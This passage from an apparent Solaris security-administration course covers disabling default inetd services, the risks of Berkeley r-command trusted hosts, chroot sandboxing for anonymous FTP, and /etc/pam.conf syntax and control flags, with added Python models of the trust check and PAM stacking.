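    echo "still enabled: $(enabled_services "$f" | tr '\n' ' ')"
    rm -f "$f"
}
demo_inetd
```

The script never rewrites the file in place: awk writes a temporary copy and mv replaces the original only if awk succeeded, so a typo in a service name cannot leave you with an empty inetd.conf.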


The following services are enabled by default, as shown in Table 13-1.

Table 13-1 Network Services Enabled by Default

ftp - /usr/sbin/in.ftpd
    Transfers files to and from a server. The FTP server has had a number of security weaknesses over time, including variations of the buffer overflow attack. FTP also sends passwords unencrypted. Disable this entry if FTP is not required. This service also supports Anonymous FTP.

telnet - /usr/sbin/in.telnetd
    Allows remote login access to a server. The telnet service sends passwords unencrypted. Disable it if the telnet service is not required. Using the Secure Shell (SSH) can eliminate the need for a telnet service.

shell - /usr/sbin/in.rshd
    Supports the rsh command for running commands on the host. Authentication relies entirely on the trusted host mechanism (hosts.equiv and .rhosts); no password is exchanged, and a client that is not trusted is refused. Use SSH in preference to the rsh command.

login - /usr/sbin/in.rlogind
    Supports the rlogin command for remote login to the host. If the trusted host mechanism is used, no password is required; otherwise the password is sent unencrypted. Use SSH in preference to the rlogin command.

exec - /usr/sbin/in.rexecd
    Supports remote execution of commands through the rexec(3SOCKET) library call. Might be used by networking software to support client functionality. Passwords are sent unencrypted. Disable it, and re-enable it only if something important stops working.

comsat - /usr/sbin/in.comsat
    Supports remote mail notification using the biff program, which informs you when mail arrives in your mailbox. Not needed on most systems.

talk - /usr/sbin/in.talkd
    Supports the talk service. Not needed on most systems.

uucp - /usr/sbin/in.uucpd
    Supports UNIX to UNIX Copy (UUCP) file copy (used by older UNIX mail programs). Not required on modern UNIX systems.

finger - /usr/sbin/in.fingerd
    Provides summary information on the operating system and the users currently logged in. The finger service can also provide more detailed information about a named user regardless of whether they are logged in. Disable this service because it provides intruders with information (such as valid user account names) that helps them attack the system.

rusersd - /usr/lib/netsvc/rusers/rpc.rusersd
    Provides information similar to the who command about users logged into the system. Disable this service for the same reason as finger: it reveals valid user account names to intruders.

sprayd - /usr/lib/netsvc/spray/rpc.sprayd
    Receives and counts the packets sent by the spray network test command. Disable this service because there are better ways to measure the network, and the sprayd service can be the target of a denial of service attack.

walld - /usr/lib/netsvc/rwall/rpc.rwalld
    Writes a message to all logged in users; intended as a site-wide broadcast mechanism. The walld service is not useful at most sites and can be used as a network attack target. If an intruder can write an arbitrary message to a user's terminal, they can use terminal (or terminal emulator) features to execute programs on behalf of the logged in user. These attacks are known as answerback or send message attacks. Disable this service.

Several other services are required to support Solaris OE remote management. These are described in the inetd.conf file. Enable only those services that are being used at your site.


FTP Users

FTP has an additional security measure that allows you to deny particular user accounts access to FTP.

The /etc/ftpusers file contains a list of all user names denied access to FTP (the file name is misleading). By default, this file contains the system accounts such as root, bin, adm, and so on. Add further user names to this file to prevent those accounts from using FTP.


Defending Network Services

It is difficult to defend the network services on your host. If you provide a service over the network you must accept the possibility of a break-in. You must trust that the network service itself is secure, but in reality many services have security weaknesses that can be attacked. Make sure that you use the latest versions of all network service software and keep up to date with the security alerts and operating system patches for your software.

Two techniques can help defend your network services against basicattacks:

● Non-standard port numbers

● Dummy services


Non-Standard Port Numbers

Consider putting services on non-standard port numbers. For example, move the telnet service to port 4321 and tell your users to use the command:

# telnet host 4321

This method does not make the service any more secure, but it can deter a casual intruder, who cannot find a telnet server on port 23 and has to look for other weaknesses.

It will not put off an experienced intruder, who can use port scanning tools to detect the telnet service regardless of port number.

Dummy Services

Running dummy services can improve your early warning system for network attacks. A dummy service is a server that sits on a well known port (such as 23 for telnet) and logs the IP address of any client that connects to that port. Although it also catches genuine user mistakes, this technique reliably detects intruders probing your system.

A simple logging service like this can be written by a C, C++, Java technology, or Perl programmer.

More sophisticated dummy servers require more development effort, but it is still relatively easy to write a server that looks and behaves like a standard service but provides no functionality except logging the connections.

One example is a telnet server that prompts for a user name and password in exactly the same manner as a real telnet server, but always denies access even if the user name and password are correct. Such a server sidetracks intruders into attacking a mechanism that cannot grant access. Imagine putting a dummy front door on your house or apartment that is nailed shut: even if it could be opened, it opens onto a solid wall.


Berkeley r Commands

A number of network security concerns involve the Berkeley r commands rlogin, rsh, and rcp. The r commands rely on privileged source ports (512 to 1023), which only root can bind; the server treats a connection from such a port as evidence that it came from the system's own client program rather than from an arbitrary user.

All three commands in the Berkeley r command set require that the user have an account on the remote system:

● The rlogin (remote login) command – Allows a login session on a remote system. To log into host wallace use:

# rlogin wallace

● The rsh (remote shell) command – Also called remsh, executes a program on a remote system. To run a ps command on host grommit use:

# rsh grommit ps -ef


● The rcp (remote copy) command – Copies files between remote systems. To copy the sulog file from host wallace to the temporary directory on grommit use:

# rcp wallace:/var/adm/sulog grommit:/tmp/sulog.wallace

Note – On some older UNIX versions the rsh command was known as remsh because /usr/bin/rsh was the restricted Bourne shell. More recent UNIX systems have moved the restricted shell to /usr/lib/rsh and standardized /usr/bin/rsh as the remote shell; /usr/bin/remsh is linked to /usr/bin/rsh to maintain backward compatibility.

The rsh and rcp commands are further restricted in that the remote host must have configured the host running the command as a trusted host (see “Trusted Hosts” on page 13-12).

You can use the rlogin command if you have an account on the remote system, even if the system you are coming from is not trusted. The rlogin command prompts for a password unless the system running the command is a trusted host.

The rlogin and rsh commands use the -l option to specify the login user name to use on the remote host. For user bob to run the ps command as the root user on grommit, Bob would type:

# rsh -l root grommit ps -ef

The rcp command can also specify user names, but because the user might be different on each machine, the file name is prefixed with the user name, much like an email address. For example:

# rcp alice@wallace:/var/adm/sulog bob@grommit:/tmp/sulog.wallace

This command reads the /var/adm/sulog file from wallace as user alice and writes the file to grommit as user bob.


Trusted Hosts

Trusted hosts are configured using two types of configuration files on the host that is the target of the remote command (not the system running the command):

● A global configuration file used for all users except root

● Individual user configuration files

For the following command, run from the host wallace, to succeed, grommit must be configured to trust wallace:

# rsh grommit ps -ef

The trusted host configuration files all have the same format, where each line represents a trusted host or a trusted host and a named user. The user defaults to the current user if no user name is supplied on the trusted host line. User names and hosts can also be specified using netgroups, as defined in the /etc/netgroup file (see the netgroup(4) manual page and the Solaris AnswerBook for a description of netgroups).


A simple trusted host file is:

wallace
grommit

Both hosts wallace and grommit are trusted.

Note – A host does not trust itself unless its own host name is included in the trusted hosts file.

A more complex trusted host file is:

wallace bob
grommit alice

In this example, only user bob on host wallace and user alice on host grommit are trusted.

Note – The host's official name must be used. Aliases are not recognized, nor are IP addresses.


In a trusted host configuration file, a line containing a single plus sign (+) means trust all known hosts. This is extremely insecure and you should never use it. Systems can be barred from access by preceding the host name with a minus sign (-), but because this only makes sense when the plus sign is also in use, it too should not be used. A host that is not listed in the configuration file is denied access.

Note – The trusted host files are one-way only. A given host specifies which other hosts it trusts. This does not imply that this host is also trusted by the ones it trusts; the other hosts have their own lists of trusted hosts.


Determining Trusted Access

When the target server determines whether a user wanting to run a remote command is trusted, it first checks the password file to ensure that the remote user has an entry on this system. If not, the command is rejected.

If the user has a valid account, the target system checks the /etc/hosts.equiv file for all users except the root user. The /etc/hosts.equiv file identifies the trusted hosts for all the non-root users on the system.

Note – Some older versions of SunOS™ and the Solaris OE ship a default /etc/hosts.equiv file with the single entry “+”. Delete this file because it is extremely insecure.


If the user is in the passwd file and the host is a trusted host, the user can use the rlogin or rsh commands without a password.

Note – Do not use user names in the hosts.equiv trusted file. You might expect that adding a user name to a line in the /etc/hosts.equiv file would restrict the use of the r commands to that named user only. However, in practice, specifying a user name usually allows the named user to run commands as any user on this server.

If the user and host are not trusted in the /etc/hosts.equiv file (remember that root does not use hosts.equiv), then the system checks for a file called $HOME/.rhosts (where $HOME is the user’s home directory). The $HOME/.rhosts file only defines trusted hosts for the user account actually running the command, which is the same as the user running the command unless the user name is supplied on the command line.

Note – When the user attempting a remote command is logged in as the root user, only the /.rhosts file is checked, not the /etc/hosts.equiv file.
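The check order described above (password file, then /etc/hosts.equiv for non-root users, then $HOME/.rhosts) as an added Python model; this is not code from the Sun course or from the r daemons, and the host wallace, the accounts and the file contents are constructed sample data. The function reports whether a password-less r command would be granted and why, and a second function lists the hosts.equiv constructs the text warns against.

```python
"""Model of the Berkeley r-command trust check (constructed example)."""
from typing import Dict, List, Set, Tuple

# Constructed sample configuration for a host named "wallace".
PASSWD_USERS: Set[str] = {"root", "alice", "bob", "eve"}
HOSTS_EQUIV: List[str] = ["gromit"]              # /etc/hosts.equiv
RHOSTS: Dict[str, List[str]] = {                 # $HOME/.rhosts per account
    "root": ["wallace alice", "wallace bob"],    # /.rhosts, as in the text
    "alice": ["shaun"],                          # ~alice/.rhosts
}


def _rhosts_match(lines: List[str], remote_host: str, remote_user: str,
                  local_user: str) -> bool:
    """A .rhosts line is 'host' (trusts the same user name from that host)
    or 'host user' (trusts that remote user for this account)."""
    for raw in lines:
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else local_user
        if host == remote_host and user == remote_user:
            return True
    return False


def trusted(remote_host: str, remote_user: str, local_user: str,
            passwd_users: Set[str] = PASSWD_USERS,
            hosts_equiv: List[str] = HOSTS_EQUIV,
            rhosts: Dict[str, List[str]] = RHOSTS) -> Tuple[bool, str]:
    """Return (granted, reason) for a password-less rsh/rlogin attempt by
    remote_user@remote_host to act as local_user on this host."""
    # Step 1: the target account must exist in the password file.
    if local_user not in passwd_users:
        return False, "no entry in the password file"
    # Step 2: /etc/hosts.equiv is consulted for every account except root.
    if local_user != "root":
        for raw in hosts_equiv:
            entry = raw.split()
            if not entry:
                continue
            if entry[0] == "+":
                # Wildcard: every known host is trusted. Report it loudly.
                return True, "hosts.equiv wildcard '+' (insecure)"
            if entry[0] == "-" + remote_host:
                return False, "host barred in hosts.equiv"
            if entry[0] == remote_host and remote_user == local_user:
                return True, "host listed in /etc/hosts.equiv"
    # Step 3: the account's own .rhosts file (/.rhosts for root).
    if _rhosts_match(rhosts.get(local_user, []), remote_host, remote_user,
                     local_user):
        return True, "entry in $HOME/.rhosts"
    return False, "not trusted: password required"


def audit_hosts_equiv(hosts_equiv: List[str] = HOSTS_EQUIV) -> List[str]:
    """List the constructs the text advises against: '+' and '-' entries
    and lines that carry a user name."""
    findings = []
    for raw in hosts_equiv:
        fields = raw.split()
        if not fields:
            continue
        if fields[0] == "+":
            findings.append("wildcard '+' trusts all known hosts")
        elif fields[0].startswith("-"):
            findings.append(f"'-' entry {fields[0]} only makes sense with '+'")
        if len(fields) > 1:
            findings.append(f"user name on line {raw!r} may grant any account")
    return findings


if __name__ == "__main__":
    # The page's own scenario: bob on wallace acting as root on wallace.
    print(trusted("wallace", "bob", "root"))
    print(audit_hosts_equiv(["+", "gromit alice"]))
```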

Trusted Hosts – Good or Bad?

Many administrators frown on the use of the trusted host mechanism and the r commands. An intruder who breaks in to a login account with this feature activated can access a large number of systems on the network. This type of access can propagate many viruses and worms. The trusted host mechanism effectively lowers the overall security of the network to that of the weakest host.

The opposing argument is that by setting up trusted hosts correctly and only where necessary, you can avoid using the telnet command to access a host and you can avoid sending unencrypted passwords across a potentially insecure network.

A useful technique with the root user trusted hosts file (/.rhosts) is to include entries for all of your administrators, which allows them to run remote commands on this host. On wallace, for example:

# cat /.rhosts
wallace alice
wallace bob

This entry allows the user alice and the user bob to run commands on the host wallace (the current system). This might not make sense until you consider that this is the root user trusted hosts file. For example, this entry allows the user bob to run the following command:

$ rsh -l root wallace passwd eve

This command allows the user bob to change the password for the user eve. The advantage of this configuration is that the user bob does not use the su command or enter the root user password. This configuration is more secure than having the user bob (who might be using the telnet command from a PC to access the server) use the su command and send unencrypted passwords over the network where they can be sniffed.

However, if the accounts for either user alice or user bob are compromised, then the root account is also compromised.

There is no right or wrong answer – just personal preferences. If you are using tools and techniques like SSL, IPS, or SSH, it is usually a good idea to disable the trusted hosts mechanism. See “Disabling Remote Access Using PAM” on page 13-38.

Securing Services With The chroot Command

The chroot command changes the root directory for the duration of a program’s execution lifetime. The effect is to run the program in a sandbox: the only files and directories that the program can access are those underneath the new root directory. With the chroot command:

● All absolute pathnames are redirected to the changed root directory (both on the command line and with any files opened) while the program executes.

● A reference to the parent directory of the changed root directory is redirected to the root directory itself (which prevents the user from using the cd .. command to move up and out of the new root directory).

The chroot command is not an easy command to use and requires considerable work and expertise to set up. However, most of the work can be easily scripted.

Intelligent use of chroot can dramatically tighten the security of a system.

When to Use the chroot Command

Use the chroot command to run network services in a sandbox. Anonymous FTP and Trivial File Transfer Protocol (TFTP) are the usual services which are run using the chroot command.

A security-conscious administrator uses the chroot command for all possible services. Candidates are:

● FTP (in addition to Anonymous FTP)

● HTTP servers (Web servers should run in a sandbox)

● The telnet program

The telnet program can be considered for chroot security. If the telnet program is configured to use the chroot command, remote administration of the host must be done from the console (or a directly attached terminal) or done using a network Common Desktop Environment (CDE) session which uses X Display Manager Control Protocol (XDMCP) for login.

● Any network service which does not require access to the full operating system

If you use the chroot command, some of the known weaknesses in network services can be minimized by presenting a very restricted view of the system.

How to Use the chroot Command

To use the chroot command, you must configure a complete environment for the executing program including:

● Executable command files

● Shared libraries

● Device files

A basic example of the chroot command that extracts a tar file into the /tmp directory is shown in Code 13-1. You can use the chroot command to extract a tar archive which has stored absolute instead of relative path names. Without the chroot command, extracting the tar archive would overwrite the existing files on disk.

Code 13-1 Using the chroot Command

# cp tools.tar /tmp
# chroot /tmp /usr/sbin/static/tar xvf /tools.tar

There are a few points to note about Code 13-1:

● The real path name for the tar archive is /tmp/tools.tar. However, the command line must use its relocated name of /tools.tar because all path names are relative to the /tmp directory (the first parameter to the chroot command).

● The /usr/sbin/static/tar command is a statically linked program (it includes all required libraries in the one executable binary). The usual tar command in /usr/bin is dynamically linked and must have the required libraries copied to the changed root directory.

● When the tar archive is extracted all files are under the /tmp directory (all absolute path names in the archive are relocated to the new root directory of /tmp).

Anonymous FTP

A more complex example of using the chroot command is one for running Anonymous FTP. The in.ftpd daemon uses the chroot mechanism when a user logs in as the anonymous user. A password must be supplied. It is conventional to use your email address as the password, but most servers accept any password.

Anonymous FTP is insecure because anyone can access the service. Anonymous FTP is usually configured so that files can only be downloaded and not uploaded onto the host.

The in.ftpd daemon needs all of its support libraries and configuration files to be in the changed root directory to run correctly. These include:

● /usr/bin – Required executable files to support FTP. The in.ftpd daemon needs at least the /usr/bin/ls file.

● /etc – Configuration files used by FTP or other programs (like ls). The in.ftpd daemon needs at least the following:

● /etc/passwd for ls listings

● /etc/default/ftpd for configuration

● /etc/default/init for the time zone

Note – The /etc/passwd file used by FTP does not need to be the same as /etc/passwd on the real system. You can use a series of dummy account names which might sidetrack potential intruders who are unaware of the chroot functionality. FTP does not need the /etc/shadow file, so it should not be copied into the changed root directory.

● /usr/lib – Required dynamic link libraries. The ldd command lists all required libraries for a given command list. Required dynamic link libraries for FTP can be obtained using:

# ldd /usr/bin/ftp /usr/bin/ls

● /usr/lib/security – Contains the security database required by most commands.

● /usr/share/lib/zoneinfo – Contains time zone configuration files.

● Include these device files that are required to support network services:

● /dev/zero

● /dev/tcp

● /dev/udp

● /dev/ticotsord

● /dev/ticlts

● /dev/null (optional, but most administrators also copy this file)

Note – Devices opened from the command line before the FTP is started (such as stdin, stdout, and stderr) do not need device files.

● A directory for the public FTP files (this is usually a directory called /pub). The public directory should be read-only to all users.

● A writable subdirectory (if you need users to upload files). To ensure that no DoS attacks can be attempted (for example by filling the FTP area with user-uploaded files), place the entire area on a separate disk partition or slice.

The in.ftpd daemon also requires a user called ftp whose home directory is the same as the root directory for Anonymous FTP access.

The online manual page for the in.ftpd daemon includes a shell script which automates the entire process. This script could be easily adapted for other network services.

Note – If the in.ftpd daemon is configured to log FTP logins, Anonymous FTP logins are also logged. Because the inetd daemon communicates directly with the Syslog daemon, no path names are required. Running the in.ftpd daemon under the chroot command does not require any special configuration.

Pluggable Authentication Module (PAM)

The Pluggable Authentication Module (PAM) framework allows new authentication technologies to be plugged in without changing system services such as login, ftp, telnet, and so on. PAM can also integrate the UNIX login service with other security mechanisms such as the Distributed Computing Environment (DCE), Generic Security Services (GSS), or the Kerberos authentication system, Sun Enterprise Authentication Mechanism (SEAM). You can also use this framework to plug in mechanisms for account, session, and password management.

The PAM application program interface (API) and Kerberos complement each other: the PAM API supports user authentication by the system entry servers while Kerberos supports network-based client–server authentication. Therefore, when users on client systems are authenticated through PAM, they can communicate securely with other Kerberos network services.

PAM is integrated into the Solaris 8 OE. PAM is also available on other versions of UNIX.

PAM Runtime Modules

PAM uses runtime pluggable modules to provide authentication for local and remote system entry services. These modules are organized into four different function types:

● Authentication modules – Provide authentication for users and allow credentials to be set, refreshed, or destroyed. Authentication modules are useful as an administration tool.

● Account modules – Check for password aging, account expiration, and access time restrictions. After the user is identified through the authentication modules, the account modules determine if the user is allowed access.

● Session modules – Manage the opening and closing of an authentication session. Session modules can log activity or clean up after the session is over.

● Password modules – Provide the mechanism for changing a password.

The module services can be stacked, which provides:

● User authentication through the use of multiple services. The PAM framework provides a method for authenticating users with multiple services using stacking. Depending on the configuration, the user can be prompted for passwords for each authentication method. The order in which the authentication services are used is determined through the PAM configuration file.

● A password-mapping feature. The stacking method can require users to remember several passwords. With the password-mapping feature enabled, the primary password decrypts the other passwords, so that the user does not have to enter multiple passwords. Another option is to synchronize the passwords across each authentication mechanism.

Note – Synchronized passwords could increase the security risk, because the security of each mechanism is limited by the least secure password method used in the stack.

The pam_unix Module

The pam_unix module, /usr/lib/security/pam_unix.so.1, provides support for all four types of runtime modules. This module uses UNIX passwords for authentication. The /etc/nsswitch.conf file defines the following name services which control password records:

● dial_auth – You can only use the /usr/lib/security/pam_dial_auth.so.1 module for authentication. (See the pam_dial_auth man page.) The dial_auth module uses data stored in the /etc/dialups and /etc/d_passwd files for authentication. The dial_auth service is mainly used by the login command.

● rhosts_auth – You can also use the /usr/lib/security/pam_rhosts_auth.so.1 module for authentication. (See the pam_rhosts_auth man page.) The rhosts_auth module uses data stored in the ~/.rhosts and /etc/hosts.equiv files and the rlogin and rsh commands.

Note – For security reasons, these module files must be owned by the root user and must not be writable through group or other permissions. If the file is not owned by the root user, PAM does not load the module.

Figure 13-1 shows how the PAM modules relate to each other and the network services using them:

Figure 13-1 PAM Module Structure

The ftp, telnet, and login applications use the PAM library to access the appropriate module. The /etc/pam.conf configuration file defines:

● Which PAM modules to use

● In what order to use modules with each application

Responses from the modules are passed back through the library to the application.

PAM Library

The PAM library, /usr/lib/libpam, provides the framework to load the appropriate modules and manage the stacking process. It also provides a generic plug-in structure for the modules.

PAM Configuration File

The /etc/pam.conf file controls the PAM configuration, determines which authentication services to use, and in which order the authentication services are used. You can edit this file to select authentication mechanisms for each system-entry application.

Configuration File Syntax

The /etc/pam.conf PAM configuration file consists of lines of tab-separated entries with the following syntax:

service_name module_type control_flag module_path module_options

Code 13-2 shows a portion of a PAM configuration file.

Code 13-2 PAM Configuration File Syntax

login auth required /usr/lib/security/pam_unix.so.1
su auth requisite /usr/lib/security/pam_inhouse.so.1
su auth required /usr/lib/security/pam_unix.so.1 debug

Each entry in Code 13-2 consists of:

● service_name – Name of the service: ftp , login , or telnet.

● module_type – Module type for the service: auth, account, session, or password.

● control_flag – Continuation or failure semantics for the module: requisite, required, sufficient, or optional. These flags are described in “PAM Control Flags” on page 13-31.

● module_path – Path to the library object that controls the service’s function.

● module_options – Module-specific options that are passed to the service modules. The values for this field can be found in the manual pages for each module. For example, the pam_unix module has the use_first_pass and try_first_pass options which allow users to reuse the same password for authentication without retyping it.

An entry in the PAM configuration file is incorrect if:

● The line has less than four fields

● An invalid value is given for module_type or control_flag

● The named module is not found
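An added checker for the three error conditions just listed, written for this edition and not part of the Sun course material or Sun's libpam parser. It assumes $ISA expands to an empty string on a 32-bit system, prefixes the default module directory to relative module names as described later in this section, and takes the set of installed modules as a parameter so that it runs offline on a constructed sample file.

```python
"""Checker for /etc/pam.conf entries (constructed example)."""
import os
from typing import Callable, List, NamedTuple, Tuple

MODULE_TYPES = {"auth", "account", "session", "password"}
CONTROL_FLAGS = {"requisite", "required", "sufficient", "optional"}
DEFAULT_MODULE_DIR = "/usr/lib/security/$ISA/"


class Entry(NamedTuple):
    service: str
    module_type: str
    control_flag: str
    module_path: str
    options: Tuple[str, ...]


def resolve_module(path: str, isa: str = "") -> str:
    """Relative module names get the default directory prefixed; $ISA is
    replaced by the architecture subdirectory (assumed empty on a 32-bit
    system, e.g. "sparcv9" on a 64-bit one)."""
    if not path.startswith("/"):
        path = DEFAULT_MODULE_DIR + path
    return os.path.normpath(path.replace("$ISA", isa))


def check_pam_conf(text: str, isa: str = "",
                   exists: Callable[[str], bool] = os.path.isfile
                   ) -> Tuple[List[Entry], List[str]]:
    """Parse pam.conf text and return (valid entries, error messages).
    Blank lines and comments are skipped; fields may be tab or space
    separated."""
    entries: List[Entry] = []
    errors: List[str] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4:
            errors.append(f"line {lineno}: fewer than four fields")
            continue
        service, mtype, flag, mpath, *opts = fields
        if mtype not in MODULE_TYPES:
            errors.append(f"line {lineno}: invalid module_type {mtype!r}")
            continue
        if flag not in CONTROL_FLAGS:
            errors.append(f"line {lineno}: invalid control_flag {flag!r}")
            continue
        full = resolve_module(mpath, isa)
        if not exists(full):
            errors.append(f"line {lineno}: module not found: {full}")
            continue
        entries.append(Entry(service, mtype, flag, full, tuple(opts)))
    return entries, errors


# Constructed sample file; pam_rhost_auth (no 's') is a deliberate typo.
SAMPLE_PAM_CONF = """\
# constructed sample pam.conf fragment
login   auth  required   /usr/lib/security/$ISA/pam_unix.so.1
rlogin  auth  sufficient /usr/lib/security/$ISA/pam_rhost_auth.so.1
rlogin  auth  required   pam_unix.so.1 try_first_pass
su      auth  requisite  pam_inhouse.so.1
su      auth  mandatory  /usr/lib/security/$ISA/pam_unix.so.1
other   auth  required
"""

# Modules assumed to be installed on the hypothetical system under check.
INSTALLED = {
    "/usr/lib/security/pam_unix.so.1",
    "/usr/lib/security/pam_rhosts_auth.so.1",
}


def check_sample() -> Tuple[List[Entry], List[str]]:
    """Run the checker against the constructed sample without touching
    the real file system."""
    return check_pam_conf(SAMPLE_PAM_CONF, exists=INSTALLED.__contains__)


if __name__ == "__main__":
    ok, bad = check_sample()
    for e in ok:
        print("ok   ", e)
    for msg in bad:
        print("ERROR", msg)
```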

PAM Control Flags

Control flags indicate how to handle a successful or a failed attempt through each module. The control flags also determine the continuation or failure behavior of a module during the authentication process.

You must use one of the four control flags (requisite, required, optional, or sufficient) for each entry. These flags apply to all module types. The control flags, when used for authentication modules, cause the following behaviors:

● requisite – The module must return success for additional authentication to occur. If a failure occurs for a module flagged as requisite, an error is returned to the application and no additional authentication is done. If the stack does not include prior failed modules labeled as required, then the error from the current module is returned. If an earlier module labeled as required has failed, the error message from the earlier module is returned.

● required – The module must return success for the overall result to be successful. If all of the modules are labeled required, then authentication through all modules must succeed for the user to be authenticated. If some of the modules fail, then an error value from the first failed module is reported. If a failure occurs for a module flagged as required, all modules in the stack are still tried but failure is returned. If none of the modules are flagged as required, then only one of the entries for that service must succeed for the user to be authenticated.

● optional – If this module fails, the overall result can be successful if another module in this stack returns success. Use the optional flag when one success in the stack is enough for a user to be authenticated. Use this flag only if it is not important for this particular mechanism to succeed. If your users need to have permissions associated with a specific mechanism, do not label the module optional.

● sufficient – If this module is successful, skip the remaining modules in the stack, even if they are labeled required. The sufficient flag indicates that one successful authentication is enough to grant the user access.

Example PAM Configuration

Code 13-3 shows an example PAM configuration file.

Code 13-3 PAM Configuration File

1  # cat /etc/pam.conf
2  #ident "@(#)pam.conf 1.15 00/02/14 SMI"
3  #
4  # Copyright (c) 1996-1999 by Sun Microsystems, Inc.
5  # All rights reserved.
6  #
7  # PAM configuration
8  #
9  # Authentication management
10 #
11 login auth required /usr/lib/security/$ISA/pam_unix.so.1
12 login auth required /usr/lib/security/$ISA/pam_dial_auth.so.1
13 #
14 rlogin auth sufficient /usr/lib/security/$ISA/pam_rhosts_auth.so.1
15 rlogin auth required /usr/lib/security/$ISA/pam_unix.so.1

16 #
17 dtlogin auth required /usr/lib/security/$ISA/pam_unix.so.1
18 #
19 rsh auth required /usr/lib/security/$ISA/pam_rhosts_auth.so.1
20 other auth required /usr/lib/security/$ISA/pam_unix.so.1
21 #
22 # Account management
23 #
24 login account requisite /usr/lib/security/$ISA/pam_roles.so.1
25 login account required /usr/lib/security/$ISA/pam_projects.so.1
26 login account required /usr/lib/security/$ISA/pam_unix.so.1
27 #
28 dtlogin account requisite /usr/lib/security/$ISA/pam_roles.so.1
29 dtlogin account required /usr/lib/security/$ISA/pam_projects.so.1
30 dtlogin account required /usr/lib/security/$ISA/pam_unix.so.1
31 #
32 other account requisite /usr/lib/security/$ISA/pam_roles.so.1
33 other account required /usr/lib/security/$ISA/pam_projects.so.1
34 other account required /usr/lib/security/$ISA/pam_unix.so.1
35 #
36 # Session management
37 #
38 other session required /usr/lib/security/$ISA/pam_unix.so.1
39 #
40 # Password management
41 #
42 other password required /usr/lib/security/$ISA/pam_unix.so.1
43 dtsession auth required /usr/lib/security/$ISA/pam_unix.so.1
44 #

In Code 13-3 on page 13-32, the $ISA variable expands to the architecture of the current system, which allows one configuration file for multiple architectures.

In Code 13-3 on page 13-32, the example file defines that:

● For login, authentication is required for both the pam_unix and the pam_dial_auth modules (Lines 11–12).

● For rlogin, if authentication through pam_rhosts_auth fails, authentication through the pam_unix module must succeed. The sufficient control flag indicates that if authentication through the pam_rhosts_auth module succeeds, the pam_unix authentication is skipped (Lines 14–15).

● Authentication for rsh must succeed through the pam_rhosts_auth module (Line 19).

● The other service name allows you to set a default for any other commands requiring authentication. The other option makes it easier to administer the file, because many commands using the same module can be covered with one other entry. In addition, the other service name ensures that each access is covered by one module. By convention, the other entry is included at the bottom of the section for each module type (Line 20 is the first example of an other entry).

● The remaining entries in the file configure the account, session, and password management.
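The four control flags described under “PAM Control Flags” and the rlogin walk-through above, modelled in an added Python simulation; this is not Sun's libpam, whose source is not on this page. A stack is a list of (control_flag, module_succeeds) pairs in pam.conf order, and the sufficient case follows the description above literally (a successful sufficient module ends the stack with success).

```python
"""Simulation of PAM control-flag stacking (constructed example)."""
from typing import List, Optional, Tuple

# A stack is the list of (control_flag, module_succeeds) for one service
# and module type, in /etc/pam.conf order.
Stack = List[Tuple[str, bool]]
VALID_FLAGS = ("requisite", "required", "sufficient", "optional")


def run_stack(stack: Stack) -> Tuple[bool, Optional[int]]:
    """Return (authenticated, index of the module whose error is reported).
    The index is None when authentication succeeds."""
    first_required_fail: Optional[int] = None
    first_fail: Optional[int] = None
    any_success = False
    has_required = any(flag == "required" for flag, _ in stack)
    for i, (flag, ok) in enumerate(stack):
        if flag not in VALID_FLAGS:
            raise ValueError(f"invalid control_flag {flag!r}")
        if ok:
            any_success = True
            if flag == "sufficient":
                # Text: skip the remaining modules, even required ones.
                # (Later PAM implementations let an earlier required failure
                # override this; the model follows the description above.)
                return True, None
            continue
        # The module failed.
        if first_fail is None:
            first_fail = i
        if flag == "requisite":
            # Stop immediately. An earlier failed required module's error
            # takes precedence over this module's error.
            if first_required_fail is not None:
                return False, first_required_fail
            return False, i
        if flag == "required" and first_required_fail is None:
            first_required_fail = i
        # Failed required, optional and sufficient modules fall through:
        # the rest of the stack is still tried.
    if first_required_fail is not None:
        return False, first_required_fail
    if has_required or any_success:
        return True, None
    # No required modules in the stack and nothing succeeded.
    return False, first_fail


def rlogin_outcome(rhosts_ok: bool, unix_ok: bool) -> bool:
    """The rlogin stack of Code 13-3: pam_rhosts_auth sufficient (line 14)
    followed by pam_unix required (line 15)."""
    authenticated, _ = run_stack([("sufficient", rhosts_ok),
                                  ("required", unix_ok)])
    return authenticated


if __name__ == "__main__":
    for rhosts_ok in (True, False):
        for unix_ok in (True, False):
            print(f"rhosts={rhosts_ok!s:5} unix={unix_ok!s:5} ->",
                  rlogin_outcome(rhosts_ok, unix_ok))
```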

The /usr/lib/security/$ISA/ path is placed in front of the file name if an absolute path is not used. Therefore, use a full path name for modules located in other directories.

If login specifies authentication through both the pam_local and pam_unix modules, then the user must enter a password for each module. If both passwords are the same, the use_first_pass module option prompts the user for only one password and uses that password to authenticate the user for both modules. If the passwords are different, the authentication fails. Use this option with an optional control flag, as shown in Code 13-4, to ensure that the user can log in.

Code 13-4 The use_first_pass Authentication Option

# Authentication management
login auth required /usr/lib/security/$ISA/pam_unix.so.1
login auth optional /usr/lib/security/$ISA/pam_local.so.1 use_first_pass

Deploying PAM

Before you decide how to employ PAM in an environment, you should address these issues first:

● Determine which modules to use

● Identify the services that need special attention; use the other service where appropriate so that every application does not have to be included

● Decide on the order in which the modules should be run

● Select the control flag for that module

● Choose any options necessary for the module

Note – Consider the security implications when using the sufficient and optional control flags.

Adding a PAM Module

To add a PAM module, follow these steps:

1. Become superuser.

2. Determine which control flags and other options to use.

3. Copy the new module to the /usr/lib/security directory.

4. Change the owner of the module to the root user with permissions 555.

5. Edit the /etc/pam.conf PAM configuration file and add this module to the appropriate services.

Caution – The superuser might not be able to log in if the PAM configuration file is misconfigured or becomes corrupted. The superuser might have to boot the machine into single-user mode to fix the problem.

6. Review the /etc/pam.conf file after making any changes effective.

7. Test the services to ensure that the configuration file has not been misconfigured. Use the rlogin, su, and telnet services.

Note – If the service being tested is a daemon that is launched when the system is booted, you might need to reboot the system to verify that the module has been added.

8. Reboot the system and test all affected services again.

Disabling Remote Access Using PAM

You can use PAM access control to disable the trusted host mechanism (/etc/hosts.equiv and .rhosts files) on a server.

To disable trusted hosts for the rlogin command, remove this entry from the PAM configuration file (/etc/pam.conf):

rlogin auth sufficient /usr/lib/security/$ISA/pam_rhosts_auth.so.1

